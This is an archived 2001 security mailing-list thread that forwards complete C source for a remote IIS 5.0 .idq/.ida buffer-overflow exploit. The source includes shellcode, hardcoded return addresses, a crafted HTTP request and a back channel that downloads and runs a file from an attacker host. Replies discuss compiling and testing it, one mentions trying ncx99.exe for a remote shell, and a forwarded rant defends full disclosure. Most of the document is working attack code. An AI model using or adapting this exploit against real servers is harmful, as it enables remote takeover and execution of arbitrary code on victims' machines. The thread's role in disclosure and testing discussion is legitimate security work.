I tried this on my IIS5 machine and it did a wonderful job of spiking inetinfo.exe to 99% cpu util. I tried sending ncx99.exe and well no port shell on 99 was granted. =( boohoo! blue Op Wed, 4 Jul 2001 04:55:09 -0400 PhoBus <ph08usat_private> geschreven: >>From my analysis of the code, the program fork()s itself and one process sends the shellcode to the target while another listens on port 80 for connections. When the target connects back, it sends the <file> to the remote system which is then executed. > >I have not been able to get the code to work (i.e. the server does not connect back). Anyone has had success testing it so far? > > >-------- Original Message -------- >Subject: Re: FWD: Re: .ida vulnerability.. >From: cdowns <cdownsat_private> >To: pen-testat_private > >well got it compiled with no problem but what the hell does <file> do ? >tried to overwrite a file in a writeable directory and then tried to >create a file in a writable directory ? hmmmmm something im not seeing >here ? thanks > >-D > >Marc Maiffret wrote: > >> This came across Steve's win2ksec mailing list almost a week or so ago. >> Not sure why none of the securityfocus mailing lists have picked it up >> (at least to my knowledge). Working remote IIS exploit for the .ida >> hole. Figured since you guys have had a discussion about writing a >> exploit for it etc... this might be helpful to you. >> >> Signed, >> Marc Maiffret >> Chief Hacking Officer >> eEye Digital Security >> T.949.349.9062 >> F.949.349.9538 >> http://eEye.com/Retina - Network Security Scanner >> http://eEye.com/Iris - Network Traffic Analyzer >> http://eEye.com/SecureIIS - Stop known and unknown IIS vulnerabilities >> >> ||> ----- Original Message ----- >> ||> From: "Steve" <steveat_private> >> ||> To: <win2ksecadviceat_private> >> ||> Sent: Wednesday, June 27, 2001 2:57 PM >> ||> Subject: Fwd: Full Disclosure .ida exploit. >> ||> >> ||> >> ||> > This was sent to me a few minutes ago. Here is the code as >> posted to ||> Packet Storm and a rant by the person who brought it to >> my attention. ||While >> ||> I normally have tried to keep rants off of the mailing list, I >> ||have always >> ||> been very pro full disclosure and will do my best to defend it. >> Please ||> note, I have not verified this code to be functioning but >> will make an ||> attempt to later this evening. If anyone else has >> time (Ken? Mark?) ||please >> ||> do so and post to the list. >> ||> > >> ||> > -Steve >> ||> > >> ||> > /* >> ||> > IIS5.0 .idq overrun remote exploit >> ||> > Programmed by hsj : 01.06.21 >> ||> > >> ||> > code flow: >> ||> > overrun -> jmp or call ebx -> jmp 8 -> >> ||> > check shellcode addr and jump to there -> >> ||> > shellcode -> make back channel -> download & exec code >> ||> > */ >> ||> > #include <stdio.h> >> ||> > #include <stdlib.h> >> ||> > #include <string.h> >> ||> > #include <signal.h> >> ||> > #include <sys/types.h> >> ||> > #include <sys/socket.h> >> ||> > #include <sys/ioctl.h> >> ||> > #include <sys/time.h> >> ||> > #include <sys/wait.h> >> ||> > #include <errno.h> >> ||> > #include <unistd.h> >> ||> > #include <fcntl.h> >> ||> > #include <netinet/in.h> >> ||> > #include <limits.h> >> ||> > #include <netdb.h> >> ||> > #include <arpa/inet.h> >> ||> > >> ||> > #define RET 0x77e516de /* jmp or call ebx */ ||> >> > #define GMHANDLEA 0x77e56c42 /* Address of >> GetModuleHandleA ||*/ >> ||> > #define GPADDRESS 0x77e59ac1 /* Address of >> |GetProcAddress */ >> ||> > #define GMHANDLEA_OFFSET 24 >> ||> > #define GPADDRESS_OFFSET 61 >> ||> > #define OFFSET 234 /* exception handler >> offset */ ||> > #define NOP 0x41 >> ||> > >> ||> > #define MASKING 1 >> ||> > #if MASKING >> ||> > #define PORTMASK 0x4141 >> ||> > #define ADDRMASK 0x41414141 >> ||> > #define PORTMASK_OFFSET 128 >> ||> > #define ADDRMASK_OFFSET 133 >> ||> > #endif >> ||> > >> ||> > #define PORT 80 >> ||> > #define ADDR "attacker.mydomain.co.jp" >> ||> > #define PORT_OFFSET 115 >> ||> > #define ADDR_OFFSET 120 >> ||> > unsigned char shellcode[]= >> ||> > >> "\x5B\x33\xC0\x40\x40\xC1\xE0\x09\x2B\xE0\x33\xC9\x41\x41\x33\xC0" ||> >> > "\x51\x53\x83\xC3\x06\x88\x03\xB8\xDD\xCC\xBB\xAA\xFF\xD0\x59\x50" >> ||> > >> "\x43\xE2\xEB\x33\xED\x8B\xF3\x5F\x33\xC0\x80\x3B\x2E\x75\x1E\x88" ||> >> > "\x03\x83\xFD\x04\x75\x04\x8B\x7C\x24\x10\x56\x57\xB8\xDD\xCC\xBB" >> ||> > >> "\xAA\xFF\xD0\x50\x8D\x73\x01\x45\x83\xFD\x08\x74\x03\x43\xEB\xD8" ||> >> > "\x8D\x74\x24\x20\x33\xC0\x50\x40\x50\x40\x50\x8B\x46\xFC\xFF\xD0" >> ||> > >> "\x8B\xF8\x33\xC0\x40\x40\x66\x89\x06\xC1\xE0\x03\x50\x56\x57\x66" ||> >> > "\xC7\x46\x02\xBB\xAA\xC7\x46\x04\x44\x33\x22\x11" >> ||> > #if MASKING >> ||> > "\x66\x81\x76\x02\x41\x41\x81\x76\x04\x41\x41\x41\x41" >> ||> > #endif >> ||> > "\x8B\x46\xF8\xFF\xD0\x33\xC0" >> ||> > >> "\xC7\x06\x5C\x61\x61\x2E\xC7\x46\x04\x65\x78\x65\x41\x88\x46\x07" ||> >> > "\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\x8B\x46\xEC\xFF\xD0" >> ||> > >> "\x8B\xD8\x33\xC0\x50\x40\xC1\xE0\x09\x50\x8D\x4E\x08\x51\x57\x8B" ||> >> > "\x46\xF4\xFF\xD0\x85\xC0\x7E\x0E\x50\x8D\x4E\x08\x51\x53\x8B\x46" >> ||> > >> "\xE8\xFF\xD0\x90\xEB\xDC\x53\x8B\x46\xE4\xFF\xD0\x57\x8B\x46\xF0" ||> >> > "\xFF\xD0\x33\xC0\x50\x56\x56\x8B\x46\xE0\xFF\xD0\x33\xC0\xFF\xD0"; >> ||> > >> ||> > unsigned char storage[]= >> ||> > "\xEB\x02" >> ||> > "\xEB\x4E" >> ||> > "\xE8\xF9\xFF\xFF\xFF" >> ||> > "msvcrt.ws2_32.socket.connect.recv.closesocket." >> ||> > "_open._write._close._execl."; >> ||> > >> ||> > unsigned char forwardjump[]= >> ||> > "%u08eb"; >> ||> > >> ||> > unsigned char jump_to_shell[]= >> ||> > "%uC033%uB866%u031F%u0340%u8BD8%u8B03" >> ||> > "%u6840%uDB33%u30B3%uC303%uE0FF"; >> ||> > >> ||> > unsigned int resolve(char *name) >> ||> > { >> ||> > struct hostent *he; >> ||> > unsigned int ip; >> ||> > >> ||> > if((ip=inet_addr(name))==(-1)) >> ||> > { >> ||> > if((he=gethostbyname(name))==0) >> ||> > return 0; >> ||> > memcpy(&ip,he->h_addr,4); >> ||> > } >> ||> > return ip; >> ||> > } >> ||> > >> ||> > int make_connection(char *address,int port) >> ||> > { >> ||> > struct sockaddr_in server,target; >> ||> > int s,i,bf; >> ||> > fd_set wd; >> ||> > struct timeval tv; >> ||> > >> ||> > s = socket(AF_INET,SOCK_STREAM,0); >> ||> > if(s<0) >> ||> > return -1; >> ||> > memset((char *)&server,0,sizeof(server)); >> ||> > server.sin_family = AF_INET; >> ||> > server.sin_addr.s_addr = htonl(INADDR_ANY); >> ||> > server.sin_port = 0; >> ||> > >> ||> > target.sin_family = AF_INET; >> ||> > target.sin_addr.s_addr = resolve(address); >> ||> > if(target.sin_addr.s_addr==0) >> ||> > { >> ||> > close(s); >> ||> > return -2; >> ||> > } >> ||> > target.sin_port = htons(port); >> ||> > bf = 1; >> ||> > ioctl(s,FIONBIO,&bf); >> ||> > tv.tv_sec = 10; >> ||> > tv.tv_usec = 0; >> ||> > FD_ZERO(&wd); >> ||> > FD_SET(s,&wd); >> ||> > connect(s,(struct sockaddr *)&target,sizeof(target)); >> ||> > if((i=select(s+1,0,&wd,0,&tv))==(-1)) >> ||> > { >> ||> > close(s); >> ||> > return -3; >> ||> > } >> ||> > if(i==0) >> ||> > { >> ||> > close(s); >> ||> > return -4; >> ||> > } >> ||> > i = sizeof(int); >> ||> > getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i); >> ||> > if((bf!=0)||(i!=sizeof(int))) >> ||> > { >> ||> > close(s); >> ||> > errno = bf; >> ||> > return -5; >> ||> > } >> ||> > ioctl(s,FIONBIO,&bf); >> ||> > return s; >> ||> > } >> ||> > >> ||> > int get_connection(int port) >> ||> > { >> ||> > struct sockaddr_in local,remote; >> ||> > int lsock,csock,len,reuse_addr; >> ||> > >> ||> > lsock = socket(AF_INET,SOCK_STREAM,0); >> ||> > if(lsock<0) >> ||> > { >> ||> > perror("socket"); >> ||> > exit(1); >> ||> > } >> ||> > reuse_addr = 1; >> ||> > if(setsockopt(lsock,SOL_SOCKET,SO_REUSEADDR,(char >> ||> *)&reuse_addr,sizeof(reuse_addr))<0) >> ||> > { >> ||> > perror("setsockopt"); >> ||> > close(lsock); >> ||> > exit(1); >> ||> > } >> ||> > memset((char *)&local,0,sizeof(local)); >> ||> > local.sin_family = AF_INET; >> ||> > local.sin_port = htons(port); >> ||> > local.sin_addr.s_addr = htonl(INADDR_ANY); >> ||> > if(bind(lsock,(struct sockaddr *)&local,sizeof(local))<0) ||> >> > { >> ||> > perror("bind"); >> ||> > close(lsock); >> ||> > exit(1); >> ||> > } >> ||> > if(listen(lsock,1)<0) >> ||> > { >> ||> > perror("listen"); >> ||> > close(lsock); >> ||> > exit(1); >> ||> > } >> ||> > retry: >> ||> > len = sizeof(remote); >> ||> > csock = accept(lsock,(struct sockaddr *)&remote,&len); ||> > >> if(csock<0) >> ||> > { >> ||> > if(errno!=EINTR) >> ||> > { >> ||> > perror("accept"); >> ||> > close(lsock); >> ||> > exit(1); >> ||> > } >> ||> > else >> ||> > goto retry; >> ||> > } >> ||> > close(lsock); >> ||> > return csock; >> ||> > } >> ||> > >> ||> > int main(int argc,char *argv[]) >> ||> > { >> ||> > int i,j,s,pid; >> ||> > unsigned int cb; >> ||> > unsigned short port; >> ||> > char *p,buf[512],buf2[512],buf3[2048]; >> ||> > FILE *fp; >> ||> > >> ||> > if(argc!=3) >> ||> > { >> ||> > printf("usage: $ %s ip file\n",argv[0]); >> ||> > return -1; >> ||> > } >> ||> > if((fp=fopen(argv[2],"rb"))==0) >> ||> > return -2; >> ||> > >> ||> > if(!(cb=resolve(ADDR))) >> ||> > return -3; >> ||> > >> ||> > if((pid=fork())<0) >> ||> > return -4; >> ||> > >> ||> > if(pid) >> ||> > { >> ||> > fclose(fp); >> ||> > s = make_connection(argv[1],80); >> ||> > if(s<0) >> ||> > { >> ||> > printf("connect error:[%d].\n",s); >> ||> > kill(pid,SIGTERM); >> ||> > return -5; >> ||> > } >> ||> > >> ||> > j = strlen(shellcode); >> ||> > *(unsigned int *)&shellcode[GMHANDLEA_OFFSET] = >> GMHANDLEA; ||> > *(unsigned int *)&shellcode[GPADDRESS_OFFSET] >> = GPADDRESS; ||> > port = htons(PORT); >> ||> > #if MASKING >> ||> > port ^= PORTMASK; >> ||> > cb ^= ADDRMASK; >> ||> > *(unsigned short *)&shellcode[PORTMASK_OFFSET] = >> PORTMASK; ||> > *(unsigned int *)&shellcode[ADDRMASK_OFFSET] = >> ADDRMASK; ||> > #endif >> ||> > *(unsigned short *)&shellcode[PORT_OFFSET] = port; ||> > >> *(unsigned int *)&shellcode[ADDR_OFFSET] = cb; >> ||> > for(i=0;i<strlen(shellcode);i++) >> ||> > { >> ||> > if((shellcode[i]==0x0a)|| >> ||> > (shellcode[i]==0x0d)|| >> ||> > (shellcode[i]==0x3a)) >> ||> > break; >> ||> > } >> ||> > if(i!=j) >> ||> > { >> ||> > printf("bad portno or ip address...\n"); >> ||> > close(s); >> ||> > kill(pid,SIGTERM); >> ||> > return -6; >> ||> > } >> ||> > >> ||> > memset(buf,1,sizeof(buf)); >> ||> > p = &buf[OFFSET-2]; >> ||> > sprintf(p,"%s",forwardjump); >> ||> > p += strlen(forwardjump); >> ||> > *p++ = 1; >> ||> > *p++ = '%'; >> ||> > *p++ = 'u'; >> ||> > sprintf(p,"%04x",(RET>>0)&0xffff); >> ||> > p += 4; >> ||> > *p++ = '%'; >> ||> > *p++ = 'u'; >> ||> > sprintf(p,"%04x",(RET>>16)&0xffff); >> ||> > p += 4; >> ||> > *p++ = 1; >> ||> > sprintf(p,"%s",jump_to_shell); >> ||> > >> ||> > memset(buf2,NOP,sizeof(buf2)); >> ||> > >> ||> >> ||memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-strlen(storage)-1],stor >> ||age,strle >> ||> n(storage)); >> ||> > >> ||> >> ||memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-1],shellcode,strlen(she >> ||llcode)); >> ||> > buf2[sizeof(buf2)-1] = 0; >> ||> > >> ||> > sprintf(buf3,"GET /a.idq?%s=a HTTP/1.0\r\nShell: >> ||> %s\r\n\r\n",buf,buf2); >> ||> > write(s,buf3,strlen(buf3)); >> ||> > >> ||> > printf("---"); >> ||> > for(i=0;i<strlen(buf3);i++) >> ||> > { >> ||> > if((i%16)==0) >> ||> > printf("\n"); >> ||> > printf("%02X ",buf3[i]&0xff); >> ||> > } >> ||> > printf("\n---\n"); >> ||> > >> ||> > wait(0); >> ||> > sleep(1); >> ||> > shutdown(s,2); >> ||> > close(s); >> ||> > >> ||> > printf("Done.\n"); >> ||> > } >> ||> > else >> ||> > { >> ||> > s = get_connection(PORT); >> ||> > j = 0; >> ||> > while((i=fread(buf,1,sizeof(buf),fp))) >> ||> > { >> ||> > write(s,buf,i); >> ||> > j += i; >> ||> > printf("."); >> ||> > fflush(stdout); >> ||> > } >> ||> > fclose(fp); >> ||> > printf("\n%d bytes send...\n",j); >> ||> > >> ||> > shutdown(s,2); >> ||> > close(s); >> ||> > } >> ||> > >> ||> > return 0; >> ||> > } >> ||> > >> ||> > >> ||> > >> ||> > >> ||> > >From: fuq69rcat_private >> ||> > >Date: Wed, 27 Jun 2001 13:17:57 -0800 (PDT) >> ||> > >To: steveat_private >> ||> > >Subject: Full Disclosure .ida exploit. >> ||> > > >> ||> > >Steve I hope you let this through you your win2k mailing list. I >> know ||its >> ||> > >a bit of a rant but I think it needs to be said and also the >> |fact that >> ||> there >> ||> > >is a link to the .ida exploit should be worth while enough. >> Thanks. ||> > >----- >> ||> > >Isn't it strange that a gift can be an enemy? That a >> ||privilege can be a >> ||> > >chore. Maybe its just me but security is going nowhere fast >> because ||> everyone >> ||> > >is to busy looking at the ten thousand foot view instead of >> getting ||down, >> ||> > > getting their hands dirty, and fixing the problem at its core. >> ||> > > >> ||> > >I see everyone trying to run around and figure out what to do >> ||about the >> ||> > >hax0rs and the script kiddies. Bureaucrats and has never >> |been security >> ||> experts >> ||> > >are all looking to form organizations that they hope will cut >> down on ||the >> ||> > >"threat" of vulnerability exposure, when thats not the real >> problem. ||> Software >> ||> > >companies writing insecure software IS the problem. >> ||> > > >> ||> > >Who gets shit on in the end? The hackers and researchers >> |putting their >> ||> own >> ||> > >time into finding vulnerabilities in software thats been >> developed by ||> multi- >> ||> > >billion dollar software companies. These same hackers and >> researchers ||who >> ||> > >have done all of this work for FREE, to help the security >> community. ||They >> ||> > >end up being the ones that get shit on for releasing this >> information ||to >> ||> > >the masses so that they might help educate people about security >> ||> vulnerabilities >> ||> > >and keep software companies on their toes and honest about ||the >> security >> ||> > >issues that affect their software. >> ||> > > >> ||> > >Most software companies do not take security seriously, >> regardless of ||> what >> ||> > >they say, because the bean counters at most software companies >> never ||see >> ||> > >an ROI (Return on Investment) for adding much needed security >> ||mechanisms >> ||> > >to their security software. Why not? because honestly not >> ||enough people >> ||> > >are standing up and demanding for a change. Instead the majority >> of ||> administrators, >> ||> > > NT at least, tend to just laugh and say, for example, "Ahh haha >> ||another >> ||> > >MS hole, what's new" and then proceed to shrug it off, stay >> |bent over, >> ||> and >> ||> > >keep taking it from software companies. >> ||> > > >> ||> > >Also for those administrators that actually do care about >> security ||you'll >> ||> > >tend to find that a lot of them are actually paranoid about >> |installing >> ||> security >> ||> > >patches from companies like Microsoft because they've had a >> |really bad >> ||> track >> ||> > >record on creating patches that end up breaking and then need >> patches ||> themselves. >> ||> > >So the administrators end up waiting for the next service pack >> (which ||> leaves >> ||> > >them vulnerable), UNLESS they have a full disclosure example >> exploit ||that >> ||> > >first hand shows them how serious the vulnerability is, at >> |which point >> ||I >> ||> > >promise you they WILL install the patch. >> ||> > > >> ||> > >I could go on forever about the circles the security industry is >> ||running >> ||> > >in or how 80% of the "security experts" have never done ANYTHING >> to ||help >> ||> > >security (hi russ!!) besides spout off their mouth about topics >> they ||> usually >> ||> > >have never really experienced first hand. >> ||> > > >> ||> > >A handful of people, like Russ Cooper, have said that when >> people ||release >> ||> > >non-malicious example exploits that it makes it easier for >> people to ||take >> ||> > >those exploits and tweak them into doing bad things. That is >> ||completely >> ||> > >inaccurate and its a statement being made by someone who >> |wouldn't know >> ||> what >> ||> > >an exploit was if shellcode slapped him in the face. >> ||> > > >> ||> > >I came across this the other day on packetstorm. Working .ida >> exploit ||> which >> ||> > >is probably one of the first publicly released, although as >> ||always when >> ||> > >any big hole is released and you don't see exploits on >> |Bugtraq or what >> ||> not >> ||> > >that MEANS thats because people aren't sharing their exploits >> with ||> everyone >> ||> > >but they are out there and most likely being used. >> ||> > > >> ||> > >> ||> >> ||>http://209.143.242.119/cgi-bin/cbmc/forums.cgi?authkey=anonymous&u >> ||name=anon >> ||> ymous&datopic=General&mesgcheck=defined&gum=3087&editoron= >> ||> > > >> ||> > >There is a whole other world out there that few people can even >> begin ||to >> ||> > >understand. Exploits are created daily for all types of >> ||vulnerabilities >> ||> > >that people might have a use for. Just because you dont see it >> on the ||> handful >> ||> > >of security mailing lists, or because CERT, NIPC, or Russ Cooper >> have ||not >> ||> > >heard about it does not mean it is not there. >> ||> > > >> ||> > >All those opposed to full disclosure, be damned. For to resist >> is to ||piss >> ||> > >against the wind and all who do will end up smelling. >> ||> > >Free, encrypted, secure Web-based email at www.hushmail.com ||> >> > >> ||> > >> _____________________________________________________________________ >> ||> > ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" >> ||> > ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice >> DIGEST" ||> > SEND ALL COMMANDS TO: listservat_private >> ||> > >> ||> >> ||> >> || >> || > >-- >------------------------------ > Christopher M Downs >Network Security Administrator > Skillsoft Corporation > cdownsat_private >"Micro$oft typed backwards > spells "c:\duh /?" >------------------------------ > > > > >---------------------------------------------------------------------------- >---------- > >This list is provided by the SecurityFocus Security Intelligence Alert >(SIA) Service For more information on SecurityFocus' SIA service which >automatically alerts you to the latest security vulnerabilities please >see: > >https://alerts.securityfocus.com/ > > >-- >Gerry Chng | Subtlety is the art of saying >mailat_private | what you think and getting out > | of the way before it is understood > > > > > >_________________________________________________________ >Get your own FREE evilemail.com Email account at... >http://www.evilemail.com > >EvilEmail.com - Free email for the living and the dead. >_________________________________________________________ > > > >-------------------------------------------------------------------------------------- > >This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service >For more information on SecurityFocus' SIA service which automatically alerts you to >the latest security vulnerabilities please see: > >https://alerts.securityfocus.com/ > > ================================================================= Kies een origineel e-mailadres op www.emails.nl -------------------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Thu Jul 05 2001 - 16:14:56 PDT